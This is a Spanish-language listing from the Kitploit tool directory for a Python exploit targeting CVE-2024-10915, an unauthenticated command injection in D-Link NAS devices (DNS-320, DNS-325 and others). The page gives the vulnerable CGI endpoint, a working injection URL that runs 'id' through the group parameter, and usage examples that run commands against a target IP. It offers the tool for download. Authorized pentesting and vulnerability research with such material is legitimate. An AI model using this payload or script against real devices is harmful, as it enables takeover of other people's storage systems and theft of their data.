Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10915 | Kitploit
Herramientas/GitHubGitHub/r0otk3r/cve-2024-10915
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed Teaming
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-10915 - Exploit de Inyección de Comandos en D-Link NAS

Este exploit basado en Python aprovecha una vulnerabilidad de inyección de comandos en varios productos D-Link NAS a través del endpoint /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. La vulnerabilidad permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema en el dispositivo afectado.

Descripción

CVE-2024-10915 afecta a múltiples modelos de D-Link NAS. Un atacante puede inyectar comandos a través del parámetro group en el comando cgi_user_add, lo que permite la ejecución remota de código.

Productos Afectados

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
Endpoint Vulnerable: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Ejemplo:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

Requisitos

  • Python 3.x

  • Librería requests

Instala las dependencias necesarias:

root@kitploit:~
pip3 install requests

Uso

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

Opciones:

Ejemplo 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

Ejemplo 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

Ejemplo 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ Aviso Legal

Este proyecto está destinado únicamente a fines educativos y de pruebas autorizadas. No utilices esta herramienta en redes o sistemas para los que no tengas permiso explícito. Los autores no asumen ninguna responsabilidad por el mal uso o los daños causados.


Canales Oficiales

  • YouTube @rootctf
  • X @r0otk3r
Descargar herramienta
OpciónDescripción
-u / --urlURL base del objetivo (p. ej. http://192.168.1.100)
-c / --commandComando a ejecutar en el dispositivo (por defecto: id)
-p / --proxyUsar un proxy HTTP (p. ej. http://127.0.0.1:8080)
-o / --outputGuardar la respuesta HTTP en un archivo
-l / --listListar los productos D-Link NAS afectados